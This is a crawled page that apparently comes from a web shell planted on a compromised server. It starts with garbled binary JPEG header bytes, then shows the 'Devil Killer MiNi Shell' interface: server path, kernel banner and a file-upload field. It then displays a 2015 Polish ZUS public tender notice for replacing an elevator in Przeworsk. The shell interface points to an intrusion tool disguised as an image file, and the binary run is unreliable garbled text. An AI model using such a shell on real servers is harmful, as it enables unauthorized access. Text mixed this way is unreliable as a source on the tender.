JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150611/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150611/85613-N-2015.html

<p class="kh_header"><b>Rzeszów: Wymiana dźwigu osobowego w Inspektoracie ZUS w Przeworsku przy ul. Dworcowej 1.</b><br>
<b>Numer ogłoszenia: 85613 - 2015; data zamieszczenia: 11.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie , Al. Piłsudskiego 12, 35-075 Rzeszów, woj. podkarpackie, tel. 17 8675000, faks 17 8523638.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana dźwigu osobowego w Inspektoracie ZUS w Przeworsku przy ul. Dworcowej 1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana dźwigu osobowego w Inspektoracie ZUS w Przeworsku przy ul. Dworcowej 1. Opis przewidywanych robót. W ramach wymiany dźwigu osobowego należy zdemontować istniejącą windę wraz istniejącym oprzyrządowaniem dla istniejącego szybu dźwigowego, zgodnie z załączoną dokumentacją projektową, specyfikacjami technicznymi na podstawie przedmiaru robót. OPIS TECHNICZNY DO PROJEKTU ZAGOSPODAROWANIA TERENU 1. Przedmiot inwestycji - dane ogólne 1.1. Warunki lokalizacyjne Działka na której zlokalizowany jest przedmiotowy budynek, objęty przedmiotem niniejszego opracowania położona jest w Przeworsku przy ul. Dworcowej 1. Budynek stanowi obiekt Inspektoratu ZUS. 1.2. Rodzaj inwestycji. W ramach realizacji przedmiotowej inwestycji planuję się wymianę windy osobowej czteropoziomowej, budowa sieci instalacji elektrycznej (oświetlenie, gniazda zasilające, zasilanie układu windy). 1.3. Istniejąca zabudowa Działka jest zabudowana przedmiotowym budynkiem. 1.4. Istniejące uzbrojenie działki Działka jest uzbrojone. Obiekty zasilone są we wszystkie niezbędne media. 1.5. Dojazdy i dojścia Dojazd i dojście do obiektu zapewnione jest od ul. Dworcowej. 2. Projektowane zagospodarowanie działki. W ramach realizacji przedmiotowej inwestycji nie przewiduję się ingerencji zagospodarowania terenu oraz zmian zewnętrznych elewacji i kubatury obiektu. 3. Dane informujące o ewentualnym wpisie do rejestru zabytków. Budynek będący przedmiotem opracowani nie jest wpisany do rejestru zabytków. 4. Informacja o wpływie inwestycji na środowisko. Przedmiotowa inwestycja nie została zakwalifikowana do inwestycji mogących pogorszyć stan środowiska naturalnego. OPIS TECHNICZNY w części konstrukcyjno - budowlanej 1. Dane ogólne. Opis techniczny został opracowany w oparciu o Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. (Dz. U. dnia 27 kwietnia 2012 r. Poz. 462) w sprawie szczegółowego zakresu i formy projektu budowlanego i zawiera opis projektu wg kolejności określonej w rozporządzeniu. Ocena techniczna stanu elementów konstrukcyjnych budynku związanych z modernizacją wynikającą z planowanego montażu dźwigu osobowego 2.Założenia wstępne Projektuje się montaż nowego dźwigu osobowego w istniejącej lokalizacji szybu windowego. W związku z przystosowaniem budynku dla potrzeb niepełnosprawnych przewiduje się ujednolicenie szerokości otworów wejściowych do windy (obecnie wymiary otworów wynoszą od zewnątrz 105cm do wewnątrz 94cm). 3.Cel i zakres opracowania Opracowanie ma na celu określenie możliwości wymiany dźwigu osobowego w istniejącym szybie windowym w budynku I ZUS w Przeworsku. 4.Opis i ocena istniejących elementów budowlanych związanych z przedmiotem opinii. 4.1. Opis ogólny szybu Istniejący szyb windowy o wymiarach 213x213cm wykonano w sposób tradycyjny murowany z cegły ceramicznej na zaprawie cementowej. Nadproża nad drzwiami szybu żelbetowe wylewane z betonu B-15, zbrojone stalą A-0 (ST0S fi12). Szyb zagruzowano do poziomu 1,95 p.p.t. i wykonano płytę żelbetową gr.15cm z betonu B-15 zbrojoną krzyżowo 10x10cm stalą A-0 ST0S. 4.2. Fundamenty dźwigu Fundament pod dźwig nie związany z fundamentem budynku z betonu B-15 o wysokości 90cm, górą i dołem zbrojony konstrukcyjnie fi12 ST0S co 30cm w obu kierunkach. Otulina fundamentu 10cm. Poziom posadowienia równy pozostałym stopom budynku. W celu uniknięcia przekazywania obciążeń z szybu dźwigu w miejscu styku ze stopą wykonano belkę ukrytą w bryle fundamentu, zbrojoną stalą A-III fi12 34GS oraz strzemionami fi6 co 10cm. 4.3. Maszynownia Stropodach niewentylowany którego konstrukcję nośną stanowią płyty wielokanałowe o rozpiętości 4,8m. Ściany maszynowni wykonano z pustaków z betonu komórkowego gr.30cm. Nadproża nad drzwiami i oknem z typowych belek prefabrykowanych L19. Płyta maszynowni żelbetowa gr.12cm z betonu B-15, stal A-0 fi 8 St0S. Cała maszynownia spoczywa na szybie windowym za pośrednictwem rusztu żelbetowego z betonu B-15, stal A-III 34GS. Stan techniczny istniejących elementów budynku określa się jako dobry. 5.Analiza stanu istniejącego szybu pod kątem możliwości montażu nowej windy. Usytuowanie nowej windy w holu głównym budynku I ZUS w Przeworsku w istniejącym szybie wymaga dostosowania szerokości wejść do windy z poszczególnych kondygnacji zgodnie z przepisami o ruchu osób niepełnosprawnych. Poszerzenie to nie koliduje z konstrukcją szybu windy, ponieważ istniejące nadproża żelbetowe mają wymiary 25x20cm i długość 150cm, zbrojone są prętami 4 fi12. Przedmiotowe nadproża znajdują się na środku ściany. W obecnej sytuacji należy ujednolicić wymiary szerokości istniejących otworów drzwiowych do wymaganych obowiązującymi przepisami poprzez skucie ścianek czołowych na każdej kondygnacji do wymaganego światła.(wg części projektu - wymiana dźwigu). Zgodnie z wymaganiami Inwestora należy przewidzieć windę osobową dostosowaną do przewozu osób niepełnosprawnych. Proponuje się montaż windy osobowej o udźwigu ok.1000kg i wymiarach wewnętrznych kabiny 1400x1600mm. usytuowanej w szybie windowym. (wg. części projektu - wymiana dźwigu). 6.Wnioski Przeprowadzona analiza pozwoliła ustosunkować się do możliwości montażu dźwigu osobowego w hallu głównym budynku I ZUS w Przeworsku oraz umożliwiła wyciągnięcie następujących wniosków: Przyjęte rozwiązanie jest lżejsze od istniejącego a zatem nie będzie dodatkowo obciążało istniejącej konstrukcji szybu. Winda osobowa dostosowana do przewozu osób niepełnosprawnych może zostać zamontowana w hallu głównym budynku I ZUS w Przeworsku pod warunkiem zachowania podanych uwag w pkt. 5 (części konstrukcyjno - budowlanej). 2. Uwagi końcowe i zalecenia wykonawcze Roboty związane z wykonaniem windy w budynku I ZUS w Przeworsku oprócz robót rozbiórkowych polegających na poszerzeniu otworów drzwiowych do wymaganych i budowlano montażowych odnoszących się do konstrukcji opisanych powyżej powinny obejmować również: - roboty elektryczne związane z ewentualnymi koniecznymi przeróbkami istniejącej instalacji, - odnowienie elementów wykończeniowych, - wykonanie zabezpieczeń i wygrodzenia od reszty budynku miejsca prowadzenia robót w sposób umożliwiający komunikację i funkcjonowanie obiektu podczas prowadzenia robót. Roboty związane z montażem dźwigu windowego należy wykonać na podstawie opracowanej dokumentacji technicznej, po uzyskaniu niezbędnych pozwoleń. Opracowana dokumentacja techniczna wykonania windy powinna uwzględniać obowiązujące przepisy budowlane oraz wytyczne podane w niniejszej opinii. OPIS TECZNICZNY w części elektrycznej 1. Dane ogólne. Opis techniczny został opracowany w oparciu o Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. (Dz. U. dnia 27 kwietnia 2012 r. Poz. 462) w sprawie szczegółowego zakresu i formy projektu budowlanego i zawiera opis projektu wg kolejności określonej w rozporządzeniu. Przedmiotem opracowania niniejszego zakresu dokumentacji jest projekt wymiany dźwigu osobowego w Inspektoracie ZUS w Przeworsku przy ul. Dworcowa 1. W celu realizacji zamierzenia budowlanego objętego przedmiotową dokumentacja projektuję się do zrealizowania następujący zakres robót: Likwidacja głównego wyłącznika windy, Instalację gniazd wtyczkowych 230V i oświetlenia podstawowego, Podłączenie do instalacji telefonicznej Podłączenie do systemu SAP 2. Zasilanie dźwigu Należy wykorzystać istniejące zasilanie tablicy wstępnej (komplet windy) zlokalizowanej w maszynowni. Przedstawiony poniżej na zdjęciu wyłącznik główny dźwigu należy zlikwidować po przez założenie puszki POH47 i zabudowanie otworu w sposób estetyczny (sklejka boazeryjna, komponująca się z istniejącą). 3. Tablice rozdzielcze Jako tablicę rozdzielczą należy traktować tablicę wstępną zlokalizowaną w maszynowni. Tablica wstępna jest do zasilania, załączania i wyłączania tablic sterowań windy. Tablica wstępna składa się z wyłącznika głównego, wyłącznika oświetleniowego kabiny, wyłącznika oświetleniowego szybu, wyłączników nadmiarowych (min. oświetlenia maszynowni, zasilania 230V), zacisków przełączeniowych, wyłączników nadmiarowo-różnicowych oraz styczniki. Aparaty elektryczne montowane są na płycie w obudowie metalowej o odporności IP44. Tablica wstępna stanowi komplet windy i należy ją dostarczyć jako komplet dźwigu osobowego. 4. Instalacja oświetlenia ogólnego Sprawdzono w obliczeniach natężenie oświetlenia w maszynowni wymagane 200lx, w szybie dźwigu 50lx zgodnie z normą PN-EN 12464-1. Instalację należy prowadzić natynkowo w listwach PVC. 5. Instalacja gniazd ogólnych Przewidziano dwa gniazda zasilające 230V 2Pplus PE zlokalizowane w maszynowni i podszybiu windy. Przewodów YDYżo 3x2,5mm2 należy prowadzić natynkowo w listwach elektroinstalacyjnych. 1. Podłączenie do centrali telefonicznej Zaprojektowano połączenie szafy sterowniczej z centralą telefoniczną. Kabel telefoniczny należy zarobić z jeden strony w szafie sterowniczej dźwigu w miejscu do tego dedykowanym, następnie w pomieszczeniu centrali telefonicznej, kabel należy zarobić na istniejących łączówkach TP. Należy wydzielić linie telefoniczną dla windy i połączyć ją przez automatyczne wybieranie z portiernią. 2. Podłączenie do systemu alarmu pożarowego SAP Zaprojektowano połączenie szafy sterowniczej z centralą systemu alarmu pożarowego SAP kablem dwu-żyłowym niepalnym. Połączenie bezpotencjałowe. Istniejącą centralę SAP (pokazaną na zdjęciu poniżej) należy doposażyć w wyjście sygnału pożaru - przekaźnik R4. 3. Uwagi końcowe: wszystkie urządzenia zaopatrzyć w tabliczki opisowe, do wykonania robót zatrudniać tylko pracowników posiadających odpowiednie zaświadczenie kwalifikacyjne całość prac wykonywać zgodnie z obowiązującymi przepisami 4. Normy PN-IEC 60364-6-61:2000 Instalacje elektryczne w obiektach budowlanych. Sprawdzenie. Sprawdzenie odbiorcze PN-IEC 60364-4-41:2000 Instalacje elektryczne w obiektach budowlanych. Ochrona dla zapewnienia bezpieczeństwa. Ochrona przeciwporażeniowa PN-EN 12464-1:2002 Światło i oświetlenie. Oświetlenie miejsc pracy. Część 1 - miejsca pracy we wnętrzach PN-IEC 60364-4-46:1999 Instalacje elektryczne w obiektach budowlanych. Ochrona dla zapewnienia bezpieczeństwa. Odłączanie izolacyjne i łączenie PN-IEC 60364-4-47:1999 Instalacje elektryczne w obiektach budowlanych. Ochrona dla zapewnienia bezpieczeństwa. Zastosowanie środków ochrony zapewniających bezpieczeństwo. Postanowienia ogólne. Środki ochrony przed porażeniem prądem elektrycznym PN-IEC 60364-4-443:1999 Instalacje elektryczne w obiektach budowlanych. Ochrona dla zapewnienia bezpieczeństwa. Ochrona przed przepięciami. Ochrona przed przepięciami atmosferycznymi lub łączeniowymi PN-IEC 60364-5-51:2000 Instalacje elektryczne w obiektach budowlanych. Dobór i montaż wyposażenia elektrycznego. Postanowienia ogólne PN-IEC 60364-5-54:1999 Instalacje elektryczne w obiektach budowlanych. Dobór i montaż wyposażenia elektrycznego. Uziemienia i przewody ochronne PN-IEC 60364-5-523:1999 Instalacje elektryczne w obiektach budowlanych. Dobór i montaż wyposażenia elektrycznego. Obciążalności prądowe długotrwałe przewodów. PN-IEC 60364-5-537:1999 Instalacje elektryczne w obiektach budowlanych. Dobór i montaż wyposażenia elektrycznego. Aparatura rozdzielcza i sterownicza. Urządzenia do odłączania izolacyjnego i łączenia PN-IEC 60364-7-707:1999 Instalacje elektryczne w obiektach budowlanych. Wymagania dotyczące specjalnych instalacji lub lokalizacji. Wymagania dotyczące uziemień instalacji urządzeń przetwarzania danych PN-IEC 60364-5-56:1999 Instalacje elektryczne w obiektach budowlanych. Dobór i montaż wyposażenia elektrycznego. Instalacje bezpieczeństwa PN-IEC 60364-4-42:1999 Instalacje elektryczne w obiektach budowlanych. Ochrona dla zapewnienia bezpieczeństwa. Ochrona przed skutkami oddziaływania cieplnego PN-IEC 60364-4-43:1999 Instalacje elektryczne w obiektach budowlanych. Ochrona dla zapewnienia bezpieczeństwa. Ochrona przed prądem przetężeniowym OPIS TECZNICZNY w części wymiany dźwigu 1. Zakres zmian W dźwigu należy wymienić wszystkie elementy znajdujące się w szybie i maszynowni. Dopuszcza się jedynie pozostawienia: Prowadnic kabinowych dźwigu Prowadnic przeciwwagowych dźwigu Klocków przeciwwagi (obciążenia) 2.Parametry techniczne dźwigu: Dźwig windowy osobowy należy zamontować jako komplet, który zawiera wszystkie elementy zadziałania mechanizmu (wraz z tablicą wstępną). Usytuowanie dźwigu: w istniejącym szybie z górną maszynownią nad szybem Napęd: cierny, elektryczny energooszczędny bezreduktorowy o mocy nie przekraczającej 6,2kW i o momencie nie mniejszym niż 500Nm, umożliwiający wykonanie 240 startów na godzinę sterowany falownikiem Liny dźwigu: klasyczne stalowe liny dźwigowe fi 8 mm, bez powłoki zewnętrznej Liczba przystanków:4 Liczba dojść: 4, rozmieszczenie jednostronne Udźwig znamionowy: co najmniej 1000 kg Prędkość jazdy: 1 m s Wymiary wewnętrzne kabiny: 1400 x 1600 mm (sz. x gł.), dopuszcza się zastosowanie kabiny o wymiarach: 1100 x 2100 mm Sterowanie: mikroprocesorowe, całkowicie elektroniczne, układ sterowania ze zbiorczością góra dół Drzwi kabinowe: automatyczne, teleskopowe, wykonane ze stali nierdzewnej, wyposażone w kurtynę świetlną, wymiary drzwi 900 x 2000 mm (szer x wys). Drzwi szybowe: automatyczne, teleskopowe, wykonane ze stali nierdzewnej, wymiary drzwi 900 x 2000 mm (szer x wys) spełniające normę DIN 18091, prowadnice drzwi wykonane ze stali ciągnionej, górne rolki wózka nie mniejsze niż 52mm Położenie maszynowni dźwigu: górne nad istniejącym szybem Położenie aparatury dźwigu: górne nad istniejącym szybem Wykończenie kabiny: ściany ze stali nierdzewnej, podłoga antypoślizgowa trudnościeralna, panel dyspozycji na ścianie bocznej wyposażony w piętrowskazywacz, oświetlenie awaryjne - min. 2 godz, poręcz ze stali nierdzewnej i lustro - na ścianie tylnej kabiny, Na każdym przystanku kasety wezwań z piętrowskazywaczem na płycie ze stali nierdzewnej, wyposażone w podświetlane przyciski z grafiką Braille a 3. Wymagania: 3.1. Należy wykonać pełną dokumentację rejestracyjną dźwigu. 3.2. Należy przeprowadzić badanie certyfikacyjne oraz rejestracyjne dźwigu w UDT 3.3. Należy wymienić zamek do drzwi do maszynowni umożliwiający otwarcie ich od środka bez użycia klucza. 3.4. Należy poprawić oświetlenie maszynowni tak, aby na poziomie podłogi wyniosło nie mniej niż 200 lx oraz wymienić istniejące oświetlenie szybu na nowe spełniające przepisy branżowe i tak: Oświetlenie szybu należy wykonać wykorzystując lampy kanałowe lub oprawy świetlówkowe. Oświetlenie szybu powinno składać się z punktów świetlnych rozmieszczonych w następujących odległościach: maks. 0,5 m od dna podszybia, maks. 0,5 m od stropu szybu, ok. 2 m pomiędzy kolejnymi punktami świetlnymi. Minimalne natężenie oświetlenia na całej wysokości szybu powinno wynosić 50 lx. 3.5. W podszybiu należy zainstalować gniazdo zasilające 230V 2Pplus PE. 3.6. Do maszynowni należy doprowadzić linię telefonii stacjonarnej lub zastosować inne równoważne rozwiązanie. 3.7. Windę należy podłączyć do Systemy Alarmu Pożarowego kablem dwu-żyłowym i stykiem bezpotencjałowym (nadanym podczas pożaru). 3.8. Należy dostosować wymiar otworu wejściowego w świetle(z naddatkiem montażowym): szerokość: 1120 mm wysokość: 2265 mm 3.9. Likwidacja istniejących zderzaków. Szczegółowy zakres robót przedstawiono w przedmiarze robót i części graficznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.11.00-1, 45.31.43.10-7, 45.21.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy biorący udział w postępowaniu zobowiązani są do wniesienia przed upływem terminu składania ofert wadium w wysokości 4.000,00 zł słownie: cztery tysiące złotych 00/100.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu udokumentowania spełniania wymaganych warunków, oraz nie podlegania wykluczeniu z postępowania należy dołączyć do oferty (przygotowanego wg wzoru zawartego w części IV SIWZ) ww. wymagane przez Zamawiającego oświadczenia i dokumenty zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. (Dz. U. z 2013 r. poz. 231) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wyszczególnionych w SIWZ. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu udokumentowania spełniania wymaganych warunków, oraz nie podlegania wykluczeniu z postępowania należy dołączyć do oferty (przygotowanego wg wzoru zawartego w części IV SIWZ) ww. wymagane przez Zamawiającego oświadczenia i dokumenty zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. (Dz. U. z 2013 r. poz. 231) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wyszczególnionych w SIWZ. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami, które będą uczestniczyć w wykonaniu zamówienia, posiadającymi uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578 z późn. zm.) w tym co najmniej jedną osobą posiadającą aktualne uprawnienia do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów przeznaczoną do pełnienia funkcji kierownika budowy, oraz osobą posiadającą aktualne uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i energoelektrycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przeznaczoną do pełnienia funkcji kierownika robót elektrycznych. Zamawiający dopuszcza posiadanie uprawnień odpowiadających wskazanym wyżej uprawnieniom budowlanym, wydanych na podstawie wcześniej obowiązujących przepisów prawa polskiego zgodnie z art. 104 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) lub wydanych obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a ustawy Prawo budowlane, ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394) oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 z późn. zm.)Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wyszczególnionych w SIWZ. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu udokumentowania spełniania wymaganych warunków, oraz nie podlegania wykluczeniu z postępowania należy dołączyć do oferty (przygotowanego wg wzoru zawartego w części IV SIWZ) ww. wymagane przez Zamawiającego oświadczenia i dokumenty zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. (Dz. U. z 2013 r. poz. 231) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wyszczególnionych w SIWZ. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu udokumentowania spełniania wymaganych warunków, oraz nie podlegania wykluczeniu z postępowania należy dołączyć do oferty (przygotowanego wg wzoru zawartego w części IV SIWZ) ww. wymagane przez Zamawiającego oświadczenia i dokumenty zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. (Dz. U. z 2013 r. poz. 231) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń wyszczególnionych w SIWZ. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
